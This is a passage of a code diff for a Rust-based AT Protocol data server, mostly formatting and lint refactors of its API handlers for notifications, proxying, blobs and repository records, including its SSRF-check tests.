let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker(
171
-
&state.circuit_breakers.plc_directory,
172
-
|| async { plc_client.send_operation(&did_clone, &operation_clone).await },
173
-
)
174
-
.await;
167
+
let result: Result<(), CircuitBreakerError<PlcError>> =
168
+
with_circuit_breaker(&state.circuit_breakers.plc_directory, || async {
169
+
plc_client
170
+
.send_operation(&did_clone, &operation_clone)
171
+
.await
172
+
})
173
+
.await;
175
174
match result {
176
175
Ok(()) => {}
177
176
Err(CircuitBreakerError::CircuitOpen(e)) => {
+1
-1
src/api/mod.rs
+1
-1
src/api/mod.rs
+1
-1
src/api/moderation/mod.rs
+1
-1
src/api/moderation/mod.rs
···
35
35
Json(input): Json<CreateReportInput>,
36
36
) -> Response {
37
37
let token = match crate::auth::extract_bearer_token_from_header(
38
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
38
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
39
39
) {
40
40
Some(t) => t,
41
41
None => return ApiError::AuthenticationRequired.into_response(),
+2
-2
src/api/notification/register_push.rs
+2
-2
src/api/notification/register_push.rs
···
1
-
use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did};
2
1
use crate::api::ApiError;
2
+
use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did};
3
3
use crate::state::AppState;
4
4
use axum::{
5
+
Json,
5
6
extract::State,
6
7
http::{HeaderMap, StatusCode},
7
8
response::{IntoResponse, Response},
8
-
Json,
9
9
};
10
10
use serde::Deserialize;
11
11
use serde_json::json;
+36
-38
src/api/notification_prefs.rs
+36
-38
src/api/notification_prefs.rs
···
1
+
use crate::auth::validate_bearer_token;
2
+
use crate::state::AppState;
1
3
use axum::{
2
4
Json,
3
5
extract::State,
···
8
10
use serde_json::json;
9
11
use sqlx::Row;
10
12
use tracing::info;
11
-
use crate::auth::validate_bearer_token;
12
-
use crate::state::AppState;
13
13
14
14
#[derive(Serialize)]
15
15
#[serde(rename_all = "camelCase")]
···
24
24
pub signal_verified: bool,
25
25
}
26
26
27
-
pub async fn get_notification_prefs(
28
-
State(state): State<AppState>,
29
-
headers: HeaderMap,
30
-
) -> Response {
27
+
pub async fn get_notification_prefs(State(state): State<AppState>, headers: HeaderMap) -> Response {
31
28
let token = match crate::auth::extract_bearer_token_from_header(
32
29
headers.get("Authorization").and_then(|h| h.to_str().ok()),
33
30
) {
34
31
Some(t) => t,
35
-
None => {
36
-
return (
37
-
StatusCode::UNAUTHORIZED,
38
-
Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})),
39
-
)
40
-
.into_response()
41
-
}
32
+
None => return (
33
+
StatusCode::UNAUTHORIZED,
34
+
Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})),
35
+
)
36
+
.into_response(),
42
37
};
43
38
let user = match validate_bearer_token(&state.db, &token).await {
44
39
Ok(u) => u,
···
47
42
StatusCode::UNAUTHORIZED,
48
43
Json(json!({"error": "AuthenticationFailed", "message": "Invalid token"})),
49
44
)
50
-
.into_response()
45
+
.into_response();
51
46
}
52
47
};
53
-
let row = match sqlx::query(
54
-
r#"
48
+
let row =
49
+
match sqlx::query(
50
+
r#"
55
51
SELECT
56
52
email,
57
53
preferred_notification_channel::text as channel,
···
63
59
signal_verified
64
60
FROM users
65
61
WHERE did = $1
66
-
"#
67
-
)
68
-
.bind(&user.did)
69
-
.fetch_one(&state.db)
70
-
.await
71
-
{
72
-
Ok(r) => r,
73
-
Err(e) => {
74
-
return (
62
+
"#,
63
+
)
64
+
.bind(&user.did)
65
+
.fetch_one(&state.db)
66
+
.await
67
+
{
68
+
Ok(r) => r,
69
+
Err(e) => return (
75
70
StatusCode::INTERNAL_SERVER_ERROR,
76
-
Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})),
71
+
Json(
72
+
json!({"error": "InternalError", "message": format!("Database error: {}", e)}),
73
+
),
77
74
)
78
-
.into_response()
79
-
}
80
-
};
75
+
.into_response(),
76
+
};
81
77
let email: String = row.get("email");
82
78
let channel: String = row.get("channel");
83
79
let discord_id: Option<String> = row.get("discord_id");
···
117
113
headers.get("Authorization").and_then(|h| h.to_str().ok()),
118
114
) {
119
115
Some(t) => t,
120
-
None => {
121
-
return (
122
-
StatusCode::UNAUTHORIZED,
123
-
Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})),
124
-
)
125
-
.into_response()
126
-
}
116
+
None => return (
117
+
StatusCode::UNAUTHORIZED,
118
+
Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})),
119
+
)
120
+
.into_response(),
127
121
};
128
122
let user = match validate_bearer_token(&state.db, &token).await {
129
123
Ok(u) => u,
···
132
126
StatusCode::UNAUTHORIZED,
133
127
Json(json!({"error": "AuthenticationFailed", "message": "Invalid token"})),
134
128
)
135
-
.into_response()
129
+
.into_response();
136
130
}
137
131
};
138
132
if let Some(ref channel) = input.preferred_channel {
···
208
202
info!(did = %user.did, "Updated Telegram username");
209
203
}
210
204
if let Some(ref signal) = input.signal_number {
211
-
let signal_clean: Option<&str> = if signal.is_empty() { None } else { Some(signal.as_str()) };
205
+
let signal_clean: Option<&str> = if signal.is_empty() {
206
+
None
207
+
} else {
208
+
Some(signal.as_str())
209
+
};
212
210
if let Err(e) = sqlx::query(
213
211
r#"UPDATE users SET signal_number = $1, signal_verified = FALSE, updated_at = NOW() WHERE did = $2"#
214
212
)
+15
-22
src/api/proxy.rs
+15
-22
src/api/proxy.rs
···
1
+
use crate::api::proxy_client::proxy_client;
1
2
use crate::state::AppState;
2
3
use axum::{
3
4
body::Bytes,
···
5
6
http::{HeaderMap, Method, StatusCode},
6
7
response::{IntoResponse, Response},
7
8
};
8
-
use crate::api::proxy_client::proxy_client;
9
9
use std::collections::HashMap;
10
10
use tracing::error;
11
11
12
12
fn resolve_service_did(did_with_fragment: &str) -> Option<(String, String)> {
13
-
if did_with_fragment.starts_with("did:web:") {
14
-
let without_prefix = &did_with_fragment[8..];
13
+
if let Some(without_prefix) = did_with_fragment.strip_prefix("did:web:") {
15
14
let host = without_prefix.split('#').next()?;
16
15
let url = format!("https://{}", host);
17
16
let did_without_fragment = format!("did:web:{}", host);
18
17
Some((url, did_without_fragment))
19
-
} else if did_with_fragment.starts_with("did:plc:") {
20
-
None
21
18
} else {
22
19
None
23
20
}
···
41
38
Some(resolved) => resolved,
42
39
None => {
43
40
error!(did = %did_str, "Could not resolve service DID");
44
-
return (StatusCode::BAD_GATEWAY, "Could not resolve service DID").into_response();
41
+
return (StatusCode::BAD_GATEWAY, "Could not resolve service DID")
42
+
.into_response();
45
43
}
46
44
};
47
45
(url, Some(did_without_fragment))
···
50
48
let url = match std::env::var("APPVIEW_URL") {
51
49
Ok(url) => url,
52
50
Err(_) => {
53
-
return (StatusCode::BAD_GATEWAY, "No upstream AppView configured").into_response();
51
+
return (StatusCode::BAD_GATEWAY, "No upstream AppView configured")
52
+
.into_response();
54
53
}
55
54
};
56
55
let aud = std::env::var("APPVIEW_DID").ok();
···
60
59
let target_url = format!("{}/xrpc/{}", appview_url, method);
61
60
let client = proxy_client();
62
61
let mut request_builder = client.request(method_verb, &target_url).query(¶ms);
63
-
let mut auth_header_val = headers.get("Authorization").map(|h| h.clone());
64
-
if let Some(aud) = &service_aud {
65
-
if let Some(token) = crate::auth::extract_bearer_token_from_header(
66
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
67
-
) {
68
-
if let Ok(auth_user) = crate::auth::validate_bearer_token(&state.db, &token).await {
69
-
if let Some(key_bytes) = auth_user.key_bytes {
70
-
if let Ok(new_token) =
62
+
let mut auth_header_val = headers.get("Authorization").cloned();
63
+
if let Some(aud) = &service_aud
64
+
&& let Some(token) = crate::auth::extract_bearer_token_from_header(
65
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
66
+
)
67
+
&& let Ok(auth_user) = crate::auth::validate_bearer_token(&state.db, &token).await
68
+
&& let Some(key_bytes) = auth_user.key_bytes
69
+
&& let Ok(new_token) =
71
70
crate::auth::create_service_token(&auth_user.did, aud, &method, &key_bytes)
72
-
{
73
-
if let Ok(val) =
71
+
&& let Ok(val) =
74
72
axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token))
75
73
{
76
74
auth_header_val = Some(val);
77
75
}
78
-
}
79
-
}
80
-
}
81
-
}
82
-
}
83
76
if let Some(val) = auth_header_val {
84
77
request_builder = request_builder.header("Authorization", val);
85
78
}
+14
-5
src/api/proxy_client.rs
+14
-5
src/api/proxy_client.rs
···
20
20
.pool_idle_timeout(Duration::from_secs(90))
21
21
.redirect(reqwest::redirect::Policy::none())
22
22
.build()
23
-
.expect("Failed to build HTTP client - this indicates a TLS or system configuration issue")
23
+
.expect(
24
+
"Failed to build HTTP client - this indicates a TLS or system configuration issue",
25
+
)
24
26
})
25
27
}
26
28
···
48
50
}
49
51
return Ok(());
50
52
}
51
-
let port = parsed.port().unwrap_or(if scheme == "https" { 443 } else { 80 });
53
+
let port = parsed
54
+
.port()
55
+
.unwrap_or(if scheme == "https" { 443 } else { 80 });
52
56
let socket_addrs: Vec<SocketAddr> = match (host, port).to_socket_addrs() {
53
57
Ok(addrs) => addrs.collect(),
54
58
Err(_) => return Err(SsrfError::DnsResolutionFailed(host.to_string())),
···
104
108
SsrfError::InsecureProtocol(p) => write!(f, "Insecure protocol: {}", p),
105
109
SsrfError::NoHost => write!(f, "No host in URL"),
106
110
SsrfError::NonUnicastIp(ip) => write!(f, "Non-unicast IP address: {}", ip),
107
-
SsrfError::DnsResolutionFailed(host) => write!(f, "DNS resolution failed for: {}", host),
111
+
SsrfError::DnsResolutionFailed(host) => {
112
+
write!(f, "DNS resolution failed for: {}", host)
113
+
}
108
114
}
109
115
}
110
116
}
···
158
164
159
165
pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 {
160
166
match limit {
161
-
Some(l) if l == 0 => default,
167
+
Some(0) => default,
162
168
Some(l) if l > max => max,
163
169
Some(l) => l,
164
170
None => default,
···
190
196
#[test]
191
197
fn test_ssrf_blocks_http_by_default() {
192
198
let result = is_ssrf_safe("http://external.example.com/xrpc/test");
193
-
assert!(matches!(result, Err(SsrfError::InsecureProtocol(_)) | Err(SsrfError::DnsResolutionFailed(_))));
199
+
assert!(matches!(
200
+
result,
201
+
Err(SsrfError::InsecureProtocol(_)) | Err(SsrfError::DnsResolutionFailed(_))
202
+
));
194
203
}
195
204
#[test]
196
205
fn test_ssrf_allows_localhost_http() {
+19
-18
src/api/read_after_write.rs
+19
-18
src/api/read_after_write.rs
···
1
+
use crate::api::ApiError;
1
2
use crate::api::proxy_client::{
2
-
is_ssrf_safe, proxy_client, MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD,
3
+
MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, is_ssrf_safe, proxy_client,
3
4
};
4
-
use crate::api::ApiError;
5
5
use crate::state::AppState;
6
6
use axum::{
7
+
Json,
7
8
http::{HeaderMap, HeaderValue, StatusCode},
8
9
response::{IntoResponse, Response},
9
-
Json,
10
10
};
11
11
use bytes::Bytes;
12
12
use chrono::{DateTime, Utc};
···
182
182
record,
183
183
});
184
184
}
185
-
} else if data.collection == "app.bsky.feed.like" {
186
-
if let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) {
185
+
} else if data.collection == "app.bsky.feed.like"
186
+
&& let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) {
187
187
result.likes.push(RecordDescript {
188
188
uri,
189
189
cid: data.cid_str,
···
191
191
record,
192
192
});
193
193
}
194
-
}
195
194
}
196
195
Ok(result)
197
196
}
···
250
249
})?;
251
250
if let Err(e) = is_ssrf_safe(&appview_url) {
252
251
error!("SSRF check failed for appview URL: {}", e);
253
-
return Err(ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
254
-
.into_response());
252
+
return Err(
253
+
ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)).into_response(),
254
+
);
255
255
}
256
256
let target_url = format!("{}/xrpc/{}", appview_url, method);
257
257
info!(target = %target_url, "Proxying request to appview");
258
258
let client = proxy_client();
259
259
let mut request_builder = client.get(&target_url).query(params);
260
260
if let Some(key_bytes) = auth_key_bytes {
261
-
let appview_did = std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
261
+
let appview_did =
262
+
std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
262
263
match crate::auth::create_service_token(auth_did, &appview_did, method, key_bytes) {
263
264
Ok(service_token) => {
264
-
request_builder = request_builder.header("Authorization", format!("Bearer {}", service_token));
265
+
request_builder =
266
+
request_builder.header("Authorization", format!("Bearer {}", service_token));
265
267
}
266
268
Err(e) => {
267
269
error!(error = ?e, "Failed to create service token");
···
287
289
Some((name, value))
288
290
})
289
291
.collect();
290
-
let content_length = resp
291
-
.content_length()
292
-
.unwrap_or(0);
292
+
let content_length = resp.content_length().unwrap_or(0);
293
293
if content_length > MAX_RESPONSE_SIZE {
294
294
error!(
295
295
content_length,
···
321
321
if e.is_timeout() {
322
322
Err(ApiError::UpstreamTimeout.into_response())
323
323
} else if e.is_connect() {
324
-
Err(ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
325
-
.into_response())
324
+
Err(
325
+
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
326
+
.into_response(),
327
+
)
326
328
} else {
327
329
Err(ApiError::UpstreamFailure.into_response())
328
330
}
···
332
334
333
335
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
334
336
let mut response = (StatusCode::OK, Json(data)).into_response();
335
-
if let Some(lag_ms) = lag {
336
-
if let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) {
337
+
if let Some(lag_ms) = lag
338
+
&& let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) {
337
339
response
338
340
.headers_mut()
339
341
.insert(UPSTREAM_LAG_HEADER, header_val);
340
342
}
341
-
}
342
343
response
343
344
}
344
345
+27
-22
src/api/repo/blob.rs
+27
-22
src/api/repo/blob.rs
···
30
30
.into_response();
31
31
}
32
32
let token = match crate::auth::extract_bearer_token_from_header(
33
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
33
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
34
34
) {
35
35
Some(t) => t,
36
36
None => {
···
122
122
.into_response();
123
123
}
124
124
};
125
-
if was_inserted {
126
-
if let Err(e) = state.blob_store.put_bytes(&storage_key, bytes::Bytes::from(data)).await {
125
+
if was_inserted
126
+
&& let Err(e) = state
127
+
.blob_store
128
+
.put_bytes(&storage_key, bytes::Bytes::from(data))
129
+
.await
130
+
{
127
131
error!("Failed to upload blob to storage: {:?}", e);
128
132
return (
129
133
StatusCode::INTERNAL_SERVER_ERROR,
···
131
135
)
132
136
.into_response();
133
137
}
134
-
}
135
138
if let Err(e) = tx.commit().await {
136
139
error!("Failed to commit blob transaction: {:?}", e);
137
-
if was_inserted {
138
-
if let Err(cleanup_err) = state.blob_store.delete(&storage_key).await {
139
-
error!("Failed to cleanup orphaned blob {}: {:?}", storage_key, cleanup_err);
140
+
if was_inserted
141
+
&& let Err(cleanup_err) = state.blob_store.delete(&storage_key).await {
142
+
error!(
143
+
"Failed to cleanup orphaned blob {}: {:?}",
144
+
storage_key, cleanup_err
145
+
);
140
146
}
141
-
}
142
147
return (
143
148
StatusCode::INTERNAL_SERVER_ERROR,
144
149
Json(json!({"error": "InternalError"})),
···
179
184
180
185
fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) {
181
186
if let Some(obj) = val.as_object() {
182
-
if let Some(type_val) = obj.get("$type") {
183
-
if type_val == "blob" {
184
-
if let Some(r) = obj.get("ref") {
185
-
if let Some(link) = r.get("$link") {
186
-
if let Some(s) = link.as_str() {
187
+
if let Some(type_val) = obj.get("$type")
188
+
&& type_val == "blob"
189
+
&& let Some(r) = obj.get("ref")
190
+
&& let Some(link) = r.get("$link")
191
+
&& let Some(s) = link.as_str() {
187
192
blobs.push(s.to_string());
188
193
}
189
-
}
190
-
}
191
-
}
192
-
}
193
194
for (_, v) in obj {
194
195
find_blobs(v, blobs);
195
196
}
···
206
207
Query(params): Query<ListMissingBlobsParams>,
207
208
) -> Response {
208
209
let token = match crate::auth::extract_bearer_token_from_header(
209
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
210
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
210
211
) {
211
212
Some(t) => t,
212
213
None => {
···
276
277
let rkey = &row.rkey;
277
278
let record_cid_str = &row.record_cid;
278
279
last_cursor = Some(format!("{}|{}", collection, rkey));
279
-
let record_cid = match Cid::from_str(&record_cid_str) {
280
+
let record_cid = match Cid::from_str(record_cid_str) {
280
281
Ok(c) => c,
281
282
Err(_) => continue,
282
283
};
···
291
292
let mut blobs = Vec::new();
292
293
find_blobs(&record_val, &mut blobs);
293
294
for blob_cid_str in blobs {
294
-
let exists = sqlx::query!("SELECT 1 as one FROM blobs WHERE cid = $1 AND created_by_user = $2", blob_cid_str, user_id)
295
-
.fetch_optional(&state.db)
296
-
.await;
295
+
let exists = sqlx::query!(
296
+
"SELECT 1 as one FROM blobs WHERE cid = $1 AND created_by_user = $2",
297
+
blob_cid_str,
298
+
user_id
299
+
)
300
+
.fetch_optional(&state.db)
301
+
.await;
297
302
match exists {
298
303
Ok(None) => {
299
304
missing_blobs.push(RecordBlob {
+2
-2
src/api/repo/import.rs
+2
-2
src/api/repo/import.rs
···
1
1
use crate::api::ApiError;
2
2
use crate::state::AppState;
3
-
use crate::sync::import::{apply_import, parse_car, ImportError};
3
+
use crate::sync::import::{ImportError, apply_import, parse_car};
4
4
use crate::sync::verify::CarVerifier;
5
5
use axum::{
6
+
Json,
6
7
body::Bytes,
7
8
extract::State,
8
9
http::StatusCode,
9
10
response::{IntoResponse, Response},
10
-
Json,
11
11
};
12
12
use serde_json::json;
13
13
use tracing::{debug, error, info, warn};
+20
-12
src/api/repo/meta.rs
+20
-12
src/api/repo/meta.rs
···
18
18
Query(input): Query<DescribeRepoInput>,
19
19
) -> Response {
20
20
let user_row = if input.repo.starts_with("did:") {
21
-
sqlx::query!("SELECT id, handle, did FROM users WHERE did = $1", input.repo)
22
-
.fetch_optional(&state.db)
23
-
.await
24
-
.map(|opt| opt.map(|r| (r.id, r.handle, r.did)))
21
+
sqlx::query!(
22
+
"SELECT id, handle, did FROM users WHERE did = $1",
23
+
input.repo
24
+
)
25
+
.fetch_optional(&state.db)
26
+
.await
27
+
.map(|opt| opt.map(|r| (r.id, r.handle, r.did)))
25
28
} else {
26
-
sqlx::query!("SELECT id, handle, did FROM users WHERE handle = $1", input.repo)
27
-
.fetch_optional(&state.db)
28
-
.await
29
-
.map(|opt| opt.map(|r| (r.id, r.handle, r.did)))
29
+
sqlx::query!(
30
+
"SELECT id, handle, did FROM users WHERE handle = $1",
31
+
input.repo
32
+
)
33
+
.fetch_optional(&state.db)
34
+
.await
35
+
.map(|opt| opt.map(|r| (r.id, r.handle, r.did)))
30
36
};
31
37
let (user_id, handle, did) = match user_row {
32
38
Ok(Some((id, handle, did))) => (id, handle, did),
···
38
44
.into_response();
39
45
}
40
46
};
41
-
let collections_query =
42
-
sqlx::query!("SELECT DISTINCT collection FROM records WHERE repo_id = $1", user_id)
43
-
.fetch_all(&state.db)
44
-
.await;
47
+
let collections_query = sqlx::query!(
48
+
"SELECT DISTINCT collection FROM records WHERE repo_id = $1",
49
+
user_id
50
+
)
51
+
.fetch_all(&state.db)
52
+
.await;
45
53
let collections: Vec<String> = match collections_query {
46
54
Ok(rows) => rows.iter().map(|r| r.collection.clone()).collect(),
47
55
Err(_) => Vec::new(),
+3
-1
src/api/repo/mod.rs
+3
-1
src/api/repo/mod.rs
···
6
6
pub use blob::{list_missing_blobs, upload_blob};
7
7
pub use import::import_repo;
8
8
pub use meta::describe_repo;
9
-
pub use record::{apply_writes, create_record, delete_record, get_record, list_records, put_record};
9
+
pub use record::{
10
+
apply_writes, create_record, delete_record, get_record, list_records, put_record,
11
+
};
+79
-45
src/api/repo/record/batch.rs
+79
-45
src/api/repo/record/batch.rs
···
1
1
use super::validation::validate_record;
2
2
use super::write::has_verified_notification_channel;
3
-
use crate::api::repo::record::utils::{commit_and_log, RecordOp};
3
+
use crate::api::repo::record::utils::{CommitParams, RecordOp, commit_and_log};
4
4
use crate::repo::tracking::TrackingBlockStore;
5
5
use crate::state::AppState;
6
6
use axum::{
7
+
Json,
7
8
extract::State,
8
9
http::StatusCode,
9
10
response::{IntoResponse, Response},
10
-
Json,
11
11
};
12
12
use cid::Cid;
13
-
use jacquard::types::{integer::LimitedU32, string::{Nsid, Tid}};
13
+
use jacquard::types::{
14
+
integer::LimitedU32,
15
+
string::{Nsid, Tid},
16
+
};
14
17
use jacquard_repo::{commit::Commit, mst::Mst, storage::BlockStore};
15
18
use serde::{Deserialize, Serialize};
16
19
use serde_json::json;
···
77
80
Json(input): Json<ApplyWritesInput>,
78
81
) -> Response {
79
82
let token = match crate::auth::extract_bearer_token_from_header(
80
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
83
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
81
84
) {
82
85
Some(t) => t,
83
86
None => {
···
154
157
.into_response();
155
158
}
156
159
};
157
-
let root_cid_str: String =
158
-
match sqlx::query_scalar!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id)
159
-
.fetch_optional(&state.db)
160
-
.await
161
-
{
162
-
Ok(Some(cid_str)) => cid_str,
163
-
_ => {
164
-
return (
165
-
StatusCode::INTERNAL_SERVER_ERROR,
166
-
Json(json!({"error": "InternalError", "message": "Repo root not found"})),
167
-
)
168
-
.into_response();
169
-
}
170
-
};
160
+
let root_cid_str: String = match sqlx::query_scalar!(
161
+
"SELECT repo_root_cid FROM repos WHERE user_id = $1",
162
+
user_id
163
+
)
164
+
.fetch_optional(&state.db)
165
+
.await
166
+
{
167
+
Ok(Some(cid_str)) => cid_str,
168
+
_ => {
169
+
return (
170
+
StatusCode::INTERNAL_SERVER_ERROR,
171
+
Json(json!({"error": "InternalError", "message": "Repo root not found"})),
172
+
)
173
+
.into_response();
174
+
}
175
+
};
171
176
let current_root_cid = match Cid::from_str(&root_cid_str) {
172
177
Ok(c) => c,
173
178
Err(_) => {
···
178
183
.into_response();
179
184
}
180
185
};
181
-
if let Some(swap_commit) = &input.swap_commit {
182
-
if Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
186
+
if let Some(swap_commit) = &input.swap_commit
187
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
183
188
return (
184
189
StatusCode::CONFLICT,
185
190
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
186
191
)
187
192
.into_response();
188
193
}
189
-
}
190
194
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
191
195
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
192
196
Ok(Some(b)) => b,
···
195
199
StatusCode::INTERNAL_SERVER_ERROR,
196
200
Json(json!({"error": "InternalError", "message": "Commit block not found"})),
197
201
)
198
-
.into_response()
202
+
.into_response();
199
203
}
200
204
};
201
205
let commit = match Commit::from_cbor(&commit_bytes) {
···
205
209
StatusCode::INTERNAL_SERVER_ERROR,
206
210
Json(json!({"error": "InternalError", "message": "Failed to parse commit"})),
207
211
)
208
-
.into_response()
212
+
.into_response();
209
213
}
210
214
};
211
215
let original_mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None);
···
220
224
rkey,
221
225
value,
222
226
} => {
223
-
if input.validate.unwrap_or(true) {
224
-
if let Err(err_response) = validate_record(value, collection) {
225
-
return err_response;
227
+
if input.validate.unwrap_or(true)
228
+
&& let Err(err_response) = validate_record(value, collection) {
229
+
return *err_response;
226
230
}
227
-
}
228
231
let rkey = rkey
229
232
.clone()
230
233
.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string());
···
234
237
}
235
238
let record_cid = match tracking_store.put(&record_bytes).await {
236
239
Ok(c) => c,
237
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to store record"}))).into_response(),
240
+
Err(_) => return (
241
+
StatusCode::INTERNAL_SERVER_ERROR,
242
+
Json(
243
+
json!({"error": "InternalError", "message": "Failed to store record"}),
244
+
),
245
+
)
246
+
.into_response(),
238
247
};
239
248
let collection_nsid = match collection.parse::<Nsid>() {
240
249
Ok(n) => n,
···
244
253
modified_keys.push(key.clone());
245
254
mst = match mst.add(&key, record_cid).await {
246
255
Ok(m) => m,
247
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to add to MST"}))).into_response(),
256
+
Err(_) => return (
257
+
StatusCode::INTERNAL_SERVER_ERROR,
258
+
Json(json!({"error": "InternalError", "message": "Failed to add to MST"})),
259
+
)
260
+
.into_response(),
248
261
};
249
262
let uri = format!("at://{}/{}/{}", did, collection, rkey);
250
263
results.push(WriteResult::CreateResult {
···
262
275
rkey,
263
276
value,
264
277
} => {
265
-
if input.validate.unwrap_or(true) {
266
-
if let Err(err_response) = validate_record(value, collection) {
267
-
return err_response;
278
+
if input.validate.unwrap_or(true)
279
+
&& let Err(err_response) = validate_record(value, collection) {
280
+
return *err_response;
268
281
}
269
-
}
270
282
let mut record_bytes = Vec::new();
271
283
if serde_ipld_dagcbor::to_writer(&mut record_bytes, value).is_err() {
272
284
return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response();
273
285
}
274
286
let record_cid = match tracking_store.put(&record_bytes).await {
275
287
Ok(c) => c,
276
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to store record"}))).into_response(),
288
+
Err(_) => return (
289
+
StatusCode::INTERNAL_SERVER_ERROR,
290
+
Json(
291
+
json!({"error": "InternalError", "message": "Failed to store record"}),
292
+
),
293
+
)
294
+
.into_response(),
277
295
};
278
296
let collection_nsid = match collection.parse::<Nsid>() {
279
297
Ok(n) => n,
···
284
302
let prev_record_cid = mst.get(&key).await.ok().flatten();
285
303
mst = match mst.update(&key, record_cid).await {
286
304
Ok(m) => m,
287
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to update MST"}))).into_response(),
305
+
Err(_) => return (
306
+
StatusCode::INTERNAL_SERVER_ERROR,
307
+
Json(json!({"error": "InternalError", "message": "Failed to update MST"})),
308
+
)
309
+
.into_response(),
288
310
};
289
311
let uri = format!("at://{}/{}/{}", did, collection, rkey);
290
312
results.push(WriteResult::UpdateResult {
···
321
343
}
322
344
let new_mst_root = match mst.persist().await {
323
345
Ok(c) => c,
324
-
Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response(),
346
+
Err(_) => {
347
+
return (
348
+
StatusCode::INTERNAL_SERVER_ERROR,
349
+
Json(json!({"error": "InternalError", "message": "Failed to persist MST"})),
350
+
)
351
+
.into_response();
352
+
}
325
353
};
326
354
let mut relevant_blocks = std::collections::BTreeMap::new();
327
355
for key in &modified_keys {
328
-
if let Err(_) = mst.blocks_for_path(key, &mut relevant_blocks).await {
356
+
if mst.blocks_for_path(key, &mut relevant_blocks).await.is_err() {
329
357
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
330
358
}
331
-
if let Err(_) = original_mst.blocks_for_path(key, &mut relevant_blocks).await {
359
+
if original_mst
360
+
.blocks_for_path(key, &mut relevant_blocks)
361
+
.await
362
+
.is_err()
363
+
{
332
364
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
333
365
}
334
366
}
···
344
376
.collect::<Vec<_>>();
345
377
let commit_res = match commit_and_log(
346
378
&state,
347
-
&did,
348
-
user_id,
349
-
Some(current_root_cid),
350
-
Some(commit.data),
351
-
new_mst_root,
352
-
ops,
353
-
&written_cids_str,
379
+
CommitParams {
380
+
did: &did,
381
+
user_id,
382
+
current_root_cid: Some(current_root_cid),
383
+
prev_data_cid: Some(commit.data),
384
+
new_mst_root,
385
+
ops,
386
+
blocks_cids: &written_cids_str,
387
+
},
354
388
)
355
389
.await
356
390
{
+61
-20
src/api/repo/record/delete.rs
+61
-20
src/api/repo/record/delete.rs
···
1
-
use crate::api::repo::record::utils::{commit_and_log, RecordOp};
1
+
use crate::api::repo::record::utils::{CommitParams, RecordOp, commit_and_log};
2
2
use crate::api::repo::record::write::prepare_repo_write;
3
3
use crate::repo::tracking::TrackingBlockStore;
4
4
use crate::state::AppState;
5
5
use axum::{
6
+
Json,
6
7
extract::State,
7
8
http::{HeaderMap, StatusCode},
8
9
response::{IntoResponse, Response},
9
-
Json,
10
10
};
11
11
use cid::Cid;
12
12
use jacquard::types::string::Nsid;
···
38
38
Ok(res) => res,
39
39
Err(err_res) => return err_res,
40
40
};
41
-
if let Some(swap_commit) = &input.swap_commit {
42
-
if Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
41
+
if let Some(swap_commit) = &input.swap_commit
42
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
43
43
return (
44
44
StatusCode::CONFLICT,
45
45
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
46
46
)
47
47
.into_response();
48
48
}
49
-
}
50
49
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
51
50
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
52
51
Ok(Some(b)) => b,
53
-
